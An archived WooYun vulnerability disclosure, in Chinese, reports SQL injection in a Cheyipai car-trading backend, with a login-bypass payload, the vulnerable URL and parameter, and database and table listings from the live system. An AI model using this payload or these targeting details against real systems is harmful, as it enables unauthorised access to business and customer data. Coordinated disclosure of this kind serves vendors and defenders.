当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187159

漏洞标题:车易拍某系统多处SQL注入

相关厂商:cheyipai.com

漏洞作者: niliu

提交时间:2016-03-21 07:33

修复时间:2016-05-05 16:34

公开时间:2016-05-05 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

-,-

详细说明:

http://xing.268v.com
一个业务后台,首先登陆接口存在注入
可直接进入
admin' or '1'='1

QQ20160320-2.png


2.
http://xing.268v.com/pages/forms/SaleBill.aspx?bid=764&wfno=SG108&bizid=764&carid=536&biztype=0&currentSubWfNo=&wfnod=SG107&isarea=
wfno 参数注入

available databases [12]:                                                      
[*] AuthenticateCar
[*] BugTracker
[*] cheyipaidb
[*] df268vdb
[*] ErrorLog
[*] master
[*] model
[*] msdb
[*] SMS
[*] tempdb
[*] xing
[*] YTUCMSDB


12个数据库

QQ20160320-0.png


漏洞证明:

Database: xing                                                                 
[87 tables]
+---------------------------+
| Area_Info                 |
| CR_PlateCode              |
| CarImport                 |
| CarManagerLog             |
| Car_Complaints            |
| Car_Favorite              |
| Car_InfoFor268v           |
| Car_Info_t                |
| Car_Info_t                |
| Car_ReportFor268v         |
| Car_Report_t              |
| Car_Tag_Mapping           |
| Department                |
| Dict_ProvinceCity         |
| Index_Ad                  |
| Index_RecommendBrand      |
| Index_RecommendBrand      |
| Index_RecommendCar        |
| Index_Subject             |
| Manager_Department        |
| Manager_PageList          |
| Manager_Role_Permission   |
| Manager_Role_Permission   |
| Manager_User_Admin        |
| Market_Info               |
| Message_Info              |
| Model_CMBasicParaInfo     |
| Model_CarBrand            |
| Model_CarCountry          |
| Model_CarMainSeries       |
| Model_CarManufacturer     |
| Model_CarModel            |
| Model_CarSeries           |
| Model_SMSSend_Record      |
| Model_SMSSend_Record      |
| OperationLog              |
| QueuedEmail               |
| Recommend_Tag_Mapping     |
| Region_Info               |
| Reservation_Info          |
| Subject_Tag_Mapping       |
| T_BCM_ProvinceCity        |
| T_SCM_CMBasicParaInfo     |
| T_SCM_CarBrand            |
| T_SCM_CarCountry          |
| T_SCM_CarMainSeries       |
| T_SCM_CarManufacturer     |
| T_SCM_CarModel            |
| T_SCM_CarSeries           |
| Tag_Info                  |
| User_Buyers               |
| User_JoinMe               |
| User_Vip_CarAddress       |
| User_Vip_CarAddress       |
| User_Vip_PaymentInfo      |
| V_Inspector_CYPStandard   |
| V_Reports_CYPStandard     |
| V_Reports_Yashi           |
| ValidCodeModel            |
| View_ManufacturerSeries   |
| View_RecommendBrand       |
| View_SearchCar            |
| View_SearchSubjectCar     |
| _CR_BasOfficeAreas        |
| _CR_BasParameterInfo      |
| _CR_EnterPrise            |
| _CR_InspeOfficeInfo       |
| _CR_Inspector             |
| _CR_Reports               |
| _Car_Brand                |
| _Car_Image                |
| _Car_Models               |
| _Car_SeriesGroup          |
| _Car_SeriesGroup          |
| _Car_Type                 |
| _T_SCM_CMBasicParaInfo    |
| _T_SCM_CarBrand           |
| _T_SCM_CarCountry         |
| _T_SCM_CarMainSeries      |
| _T_SCM_CarManufacturer    |
| _T_SCM_CarModel           |
| _T_SCM_CarSeries          |
| car_report_bak1030        |
| car_report_bak1030        |
| sysdiagrams               |
| tb_EnterPrise_CYPStandard |
| tmp0928                   |
+---------------------------+


修复方案:

加强过滤

版权声明:转载请注明来源 niliu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-21 16:34

厂商回复:

漏洞已确认,感谢关注

最新状态:

暂无